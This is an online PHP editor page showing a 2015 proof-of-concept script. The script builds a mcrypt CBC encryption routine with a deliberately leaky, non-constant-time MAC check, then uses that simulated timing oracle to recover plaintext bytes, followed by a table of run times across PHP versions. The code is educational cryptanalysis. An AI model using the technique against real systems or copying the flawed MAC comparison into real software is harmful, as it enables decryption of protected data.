Online PHP editor | perf for k68uO

<?php define('ENCRYPTION_KEY', 'd0a7e7997b6d5fcd55f4b5c32611b87cd923e88837b63bf2941ef819dc8ca282'); // Encrypt Function function mc_encrypt($encrypt, $key){ //$encrypt = serialize($encrypt); $iv = mcrypt_create_iv(mcrypt_get_iv_size(MCRYPT_RIJNDAEL_256, MCRYPT_MODE_CBC), MCRYPT_DEV_URANDOM); $key = pack('H*', $key); $mac = hash_hmac('sha256', $encrypt, substr(bin2hex($key), -32)); $passcrypt = mcrypt_encrypt(MCRYPT_RIJNDAEL_256, $key, $encrypt.$mac, MCRYPT_MODE_CBC, $iv); $encoded = base64_encode($passcrypt).'|'.base64_encode($iv); return $encoded; } // Decrypt Function function mc_decrypt($decrypt, $key){ $decrypt = explode('|', $decrypt.'|'); $decoded = base64_decode($decrypt[0]); $iv = base64_decode($decrypt[1]); if(strlen($iv)!==mcrypt_get_iv_size(MCRYPT_RIJNDAEL_256, MCRYPT_MODE_CBC)){ return false; } $key = pack('H*', $key); //$decrypted = trim(mcrypt_decrypt(MCRYPT_RIJNDAEL_256, $key, $decoded, MCRYPT_MODE_CBC, $iv)); $decrypted = mcrypt_decrypt(MCRYPT_RIJNDAEL_256, $key, $decoded, MCRYPT_MODE_CBC, $iv); $mac = substr($decrypted, -64); $decrypted = substr($decrypted, 0, -64); $calcmac = hash_hmac('sha256', $decrypted, substr(bin2hex($key), -32)); // if($calcmac!==$mac){ return false; } // Simulate the timing side channel with 1-byte granularity. if($calcmac!==$mac){ if ($calcmac[0] == $mac[0]) { return 1; } else { return 0; } } //$decrypted = unserialize($decrypted); return $decrypted; } /* * Attack code. By Taylor Hornby (@DefuseSec), June 08, 2015. */ // The message we want to decrypt. $message = "Cryptography is harder than you think! You can't assemble it like Lego!"; // Encrypt the message. $ciphertext = mc_encrypt($message, ENCRYPTION_KEY); // From here on, all we're allowed to do is (1) Get known plaintexts, and (2) // Use the (simulated) timing oracle. // We're going to get the first byte of each decrypted block, so split the // target ciphertext into blocks. $ct_parts = explode('|', $ciphertext); $ct_blocks = str_split(base64_decode($ct_parts[0]), 32); // Add the IV in front. We need it later and having it in index zero makes the // code below more conveinient. array_unshift($ct_blocks, base64_decode($ct_parts[1])); // Remove the MAC blocks off the end (we don't care what they decrypt to). $ct_blocks = array_slice($ct_blocks, 0, -2); // This array will hold our known plaintexts. We want one known plaintext for // each byte value \x00 though \xFF. The respective plaintext should be a single // block that decrypts to a block having that value as its first byte (BEFORE // the CBC mode XOR). $firstbytes = array(); // Just keep getting known plaintexts until we have all the byte values. while (count($firstbytes) < 256) { // We're choosing the plaintext here, but that's not necessary. The contents // don't matter, as long as we know what the first byte is. $kp = mc_encrypt(str_repeat("a", 32), ENCRYPTION_KEY); // Break the ciphertext apart. $parts = explode('|', $kp); $iv = base64_decode($parts[1]); $ct = substr(base64_decode($parts[0]), 0, 32); // We know the decrypted result after the CBC-mode XOR is "a", so the value // just after decryption but before the CBC-mode XOR is this: $firstbyte = ord($iv[0]) ^ ord("a"); // Remember this block as decrypting to block that starts with that byte. // We might have already found one for this byte value, if that's the case // we just overwrite it. $firstbytes[$firstbyte] = $ct; } // Loop over all of the ciphertext blocks we want to decrypt the first byte of. // (Note: Index 0 is the IV, as we set above). for ($i = 1; $i < count($ct_blocks); $i++) { $ct_block = $ct_blocks[$i]; // We'll use zero IVs for our oracle queries. We could use anything really. $zero_block = str_repeat("\x00", 32); // Some padding to be the last (of two) blocks of the MAC. $p = mcrypt_create_iv(32, MCRYPT_DEV_URANDOM); // Find a collision in the first byte of the computed MAC and "included MAC". $r = mcrypt_create_iv(32, MCRYPT_DEV_URANDOM); $ct = base64_encode($r . $ct_block . $p) . "|" . base64_encode($zero_block); while (mc_decrypt($ct, ENCRYPTION_KEY) !== 1) { $r = mcrypt_create_iv(32, MCRYPT_DEV_URANDOM); $ct = base64_encode($r . $ct_block . $p) . "|" . base64_encode($zero_block); } // In the above, the "computed MAC" is the MAC of whatever $r decrypts to // with a null IV. The "included MAC" is the first byte of the decrypted // value of $ct_block (before the CBC-XOR) XORed with $r[0]. // So a collision means two things: // 1. Decrypting $ct_block with $r as an "IV" makes the first byte a hex // digit, and // 2. That hex digit is the same as the one that the MAC of whatever $r // decrypts to starts with. // If only we could find out what that hex digit is... then we could find // out what the first byte of the decrypted $ct_block is. Let's use our // known plaintexts to do just that... // Try decrypting with our known-first-byte blocks in place of $ct_block. for ($first_byte = 0; $first_byte <= 255; $first_byte++) { $ct = base64_encode($r . $firstbytes[$first_byte] . $p) . "|" . base64_encode($zero_block); if (($res = mc_decrypt($ct, ENCRYPTION_KEY)) === 1) { // The computed MAC value won't have changed, and we know the first // byte still matches so that means the first byte (after decryption // but before XOR) of our known plaintext block is the same as the // first byte (after decryption but before XOR) of $ct_block. // We know what that byte is! So let's XOR it with the first byte of // the previous block in the whole ciphertext we're working on to // get the proper (after CBC-XOR) decryption. $iv_decrypted_byte = ord($ct_blocks[$i-1][0]) ^ $first_byte; echo "Block $i's first byte is: " . chr($iv_decrypted_byte) . "\n"; break; } } }

Version	System time (s)	User time (s)	Memory (MiB)
8.3.6	0.009	0.006	16.75
8.3.5	0.006	0.009	18.18
8.3.4	0.003	0.012	18.81
8.3.3	0.011	0.011	18.65
8.3.2	0.004	0.004	20.20
8.3.1	0.009	0.000	23.56
8.3.0	0.006	0.003	19.13
8.2.18	0.015	0.000	25.92
8.2.17	0.015	0.003	22.96
8.2.16	0.012	0.003	20.33
8.2.15	0.011	0.007	24.18
8.2.14	0.003	0.005	24.66
8.2.13	0.003	0.006	17.75
8.2.12	0.008	0.000	26.35
8.2.11	0.003	0.007	22.08
8.2.10	0.008	0.003	18.09
8.2.9	0.008	0.000	19.21
8.2.8	0.000	0.008	17.97
8.2.7	0.003	0.005	17.50
8.2.6	0.004	0.004	17.92
8.2.5	0.003	0.006	18.07
8.2.4	0.000	0.007	19.37
8.2.3	0.000	0.007	20.75
8.2.2	0.003	0.006	17.80
8.2.1	0.004	0.004	18.21
8.2.0	0.006	0.003	18.10
8.1.28	0.003	0.017	25.92
8.1.27	0.007	0.003	23.91
8.1.26	0.005	0.003	28.09
8.1.25	0.010	0.000	28.09
8.1.24	0.007	0.011	22.20
8.1.23	0.008	0.004	19.21
8.1.22	0.006	0.003	17.89
8.1.21	0.004	0.004	18.77
8.1.20	0.003	0.006	17.60
8.1.19	0.004	0.004	17.35
8.1.18	0.003	0.005	18.10
8.1.17	0.000	0.008	18.90
8.1.16	0.004	0.004	21.95
8.1.15	0.004	0.004	18.82
8.1.14	0.000	0.008	17.38
8.1.13	0.003	0.003	17.81
8.1.12	0.000	0.008	17.41
8.1.11	0.004	0.004	17.55
8.1.10	0.009	0.003	17.52
8.1.9	0.000	0.007	17.50
8.1.8	0.000	0.007	17.56
8.1.7	0.004	0.004	17.47
8.1.6	0.005	0.003	17.60
8.1.5	0.003	0.006	17.49
8.1.4	0.003	0.005	17.55
8.1.3	0.000	0.008	17.72
8.1.2	0.003	0.006	17.68
8.1.1	0.000	0.008	17.50
8.1.0	0.004	0.004	17.48
8.0.30	0.005	0.003	18.77
8.0.29	0.004	0.004	16.75
8.0.28	0.003	0.003	18.62
8.0.27	0.004	0.004	16.86
8.0.26	0.003	0.003	17.37
8.0.25	0.000	0.007	17.15
8.0.24	0.007	0.000	16.97
8.0.23	0.003	0.003	17.05
8.0.22	0.003	0.003	17.00
8.0.21	0.004	0.004	16.91
8.0.20	0.000	0.007	17.08
8.0.19	0.004	0.004	16.96
8.0.18	0.005	0.002	16.99
8.0.17	0.002	0.005	16.94
8.0.16	0.003	0.006	17.00
8.0.15	0.000	0.008	16.96
8.0.14	0.004	0.004	16.84
8.0.13	0.000	0.006	13.48
8.0.12	0.000	0.008	16.82
8.0.11	0.003	0.006	16.93
8.0.10	0.008	0.000	16.91
8.0.9	0.000	0.007	16.97
8.0.8	0.007	0.013	17.02
8.0.7	0.000	0.008	16.86
8.0.6	0.008	0.000	17.04
8.0.5	0.000	0.008	17.06
8.0.3	0.006	0.010	17.09
8.0.2	0.011	0.008	17.40
8.0.1	0.004	0.004	17.11
8.0.0	0.008	0.009	16.97
7.4.33	0.000	0.005	16.91
7.4.32	0.000	0.006	16.64
7.4.30	0.003	0.003	16.66
7.4.29	0.000	0.007	16.67
7.4.28	0.006	0.003	16.59
7.4.27	0.000	0.007	16.66
7.4.26	0.000	0.009	16.64
7.4.25	0.007	0.003	16.46
7.4.24	0.002	0.005	16.62
7.4.23	0.007	0.000	16.75
7.4.22	0.011	0.013	16.71
7.4.21	0.009	0.006	16.56
7.4.20	0.000	0.007	16.52
7.4.16	0.012	0.004	16.67
7.4.15	0.010	0.007	17.40
7.4.14	0.012	0.006	17.86
7.4.13	0.008	0.011	16.66
7.4.12	0.011	0.009	16.63
7.4.11	0.012	0.011	16.68
7.4.10	0.011	0.007	16.37
7.4.9	0.010	0.007	16.71
7.4.8	0.004	0.018	19.39
7.4.7	0.011	0.008	16.65
7.4.6	0.014	0.005	16.64
7.4.5	0.010	0.006	16.54
7.4.4	0.016	0.004	16.44
7.4.3	0.006	0.011	16.63
7.4.0	0.014	0.003	14.80
7.3.33	0.000	0.006	13.20
7.3.32	0.005	0.000	13.38
7.3.31	0.005	0.002	16.21
7.3.30	0.004	0.004	16.21
7.3.29	0.003	0.003	16.30
7.3.28	0.010	0.006	16.37
7.3.27	0.009	0.009	17.40
7.3.26	0.013	0.004	16.63
7.3.25	0.004	0.015	16.47
7.3.24	0.010	0.009	16.46
7.3.23	0.011	0.007	16.39
7.3.21	0.000	0.017	16.46
7.3.20	0.005	0.011	16.47
7.3.19	0.004	0.013	16.50
7.3.18	0.007	0.014	16.51
7.3.17	0.009	0.013	16.40
7.3.16	0.010	0.007	16.48
7.2.33	0.007	0.010	16.73
7.2.32	0.015	0.006	16.36
7.2.31	0.016	0.007	16.71
7.2.30	0.007	0.010	16.55
7.2.29	0.009	0.009	16.40
7.2.6	0.007	0.010	16.73
7.2.0	0.010	0.003	19.42
7.1.20	0.003	0.009	15.79
7.1.10	0.000	0.011	18.25
7.1.7	0.000	0.007	17.06
7.1.6	0.011	0.011	19.36
7.1.5	0.004	0.018	17.04
7.1.0	0.003	0.073	22.28
7.0.20	0.007	0.000	16.64
7.0.6	0.023	0.063	20.01
7.0.5	0.037	0.220	18.16
7.0.4	0.127	0.323	20.23
7.0.3	0.053	0.273	20.13
7.0.2	0.073	0.260	20.16
7.0.1	0.060	0.333	20.13
7.0.0	0.043	0.297	20.14
5.6.28	0.000	0.040	21.07
5.6.21	0.010	0.080	20.73
5.6.20	0.017	0.223	18.27
5.6.19	0.040	0.307	20.66
5.6.18	0.040	0.170	20.46
5.6.17	0.043	0.200	20.51
5.6.16	0.040	0.267	20.62
5.6.15	0.080	0.403	18.27
5.6.14	0.020	0.260	18.34
5.6.13	0.010	0.333	18.35
5.6.12	0.023	0.267	21.14
5.6.11	0.053	0.290	21.25
5.6.10	0.073	0.283	21.21
5.6.9	0.023	0.163	21.13
5.6.8	0.047	0.313	20.68
5.5.35	0.040	0.067	20.46
5.5.34	0.030	0.207	18.11
5.5.33	0.020	0.283	20.32
5.5.32	0.090	0.317	20.42
5.5.31	0.047	0.287	20.36
5.5.30	0.040	0.303	18.11
5.5.29	0.063	0.247	18.17
5.5.28	0.030	0.363	20.92
5.5.27	0.037	0.230	20.96
5.5.26	0.033	0.323	20.91
5.5.25	0.047	0.273	20.64
5.5.24	0.047	0.237	20.30